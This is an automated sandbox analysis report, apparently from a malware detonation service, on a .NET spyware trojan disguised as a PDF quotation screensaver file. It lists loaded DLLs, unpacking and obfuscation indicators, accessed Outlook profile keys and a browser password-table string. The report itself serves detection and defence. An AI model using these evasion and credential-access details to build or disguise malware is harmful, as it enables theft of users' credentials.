Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winSCR@3/0@3/3

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Mutant created: NULL

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3288501589.000000000419D000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003264000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003274000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000004.00000002.3287257268.0000000003282000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	Virustotal: Detection: 34%
Source: QUOTATION_JANQUOTE312025#U00faPDF.scr	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr" /S
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process created: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr "C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr"	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004081000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2585016983.0000000006380000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2581469849.0000000004116000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2588070526.0000000006F50000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: QUOTATION_JANQUOTE312025#U00faPDF.scr, Pdtho.cs	.Net Code: Flpibfvlbhe System.AppDomain.Load(byte[])
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.4089550.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6f50000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.41d04c8.1.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6380000.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6ed0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2587912231.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2570021211.0000000003081000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_JANQUOTE312025#U00faPDF.scr PID: 1852, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_063F2F7D push es; ret	0_2_063F2F90
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 0_2_063F70BE pushfd ; ret	0_2_063F70C1
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_01641B0D push 0000002Fh; ret	4_2_01641B0F
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_01648290 push esi; ret	4_2_01648298
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_0164768E push ecx; iretd	4_2_0164769D
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_068876EF push es; ret	4_2_068876F0
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_06886C65 push es; iretd	4_2_06886C70
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Code function: 4_2_068880B3 push es; iretd	4_2_068880B4

Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, S1Zbg2pp4rKsDwwU6hU.cs	High entropy of concatenated method names: 'evSgnamFd4', 'l7Hgp65Cd3', 'cu6gS4YKVR', 'JnqgZl13qU', 'psygK57mQZ', 'VtCgNZSgS6', 'YlN6W2KaFkLY6wukmJD', 'nuhdB6KhLAS4t2nqbA3', 'lpapx5j388', 'zunpU1Z1rR'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, FLQdLKipqaaenTJXjB.cs	High entropy of concatenated method names: 'Tqfn3DavBZ', 'QAunHLlwgu', 'H5Viw7K5iQF5pXkAHet', 'GlLBosKjBYDl6M3OHQp', 'OVDnesZ0hp', 'qw6nYQL4Fm', 'by1nRJZHoF', 'yRhnAnxZUA', 'sfonL39AHB', 'ydZnht7xjE'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, WYLyjjj40ulemrXCrq.cs	High entropy of concatenated method names: 'XAVrd6Etk', 'bgBRKClva', 'Equals', 'GetHashCode', 'FTuPiIhDL', 'ToString', 'RW7MxbowrOr4GHg4qBt', 'SiofoRoEwZom2wSEuIU', 'Equals', 'GetHashCode'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, Fr4n8SUYvjDoWbtyTfS.cs	High entropy of concatenated method names: 'zs2LC7Nh2kmxionfSaD', 'WdQSc1NGILvK5s8n1p1', 'upMZxjlaFA', 'vh0ry9Sq2v', 'UEOZ9jojct', 'HYgZqRCBn0', 'FYxZ58VM1F', 'K13ZjVCDat', 'b6U9F3qIs7', 'isFU2xeVGX'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, MozilSpeed.cs	High entropy of concatenated method names: 'O96gi5Mr9H', 'xKEgBZPJrZ', 'uUggO6BXvW', 'm93gbGFJog', 'XffgzNX88v', 'GN2xJ6WWls', 'chmYwGNo3kYiKQMaRv8', 'SUPVH7NK81etvfCRxWf', 'oNJxSKbHI1', 'VJbxZmjSqK'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.42c3538.0.raw.unpack, O0Xg0iZCGY2HILYMOtg.cs	High entropy of concatenated method names: 'BLYZyvD1T8', 'ngqZA2YbP4', 'mhdZLUDlrq', 'KKVZa6gQWE', 'UUTZhGMQ5d', 'r7pZG9drDa', 'UseZ18caIH', 'Ur9ZvKkx8U', 'WjbZFtQg9u', 'Fr4ZcylOCZ'
Source: 0.2.QUOTATION_JANQUOTE312025#U00faPDF.scr.6970000.5.raw.unpack, S6TDLc8IE8bNBtjRbO5.cs	High entropy of concatenated method names: 'e5m8OKCmvU', 'y4p8qeKE2F', 'hiS8extCV8', 'IKA8hTcElF', 'XbV8kesJDN', 'by08MLSvwN', 'KZ881lxbE5', 'zUW8iTYC0q', 'JxA8XA026y', 'E9O8xHEXIp'

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_JANQUOTE312025#U00faPDF.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
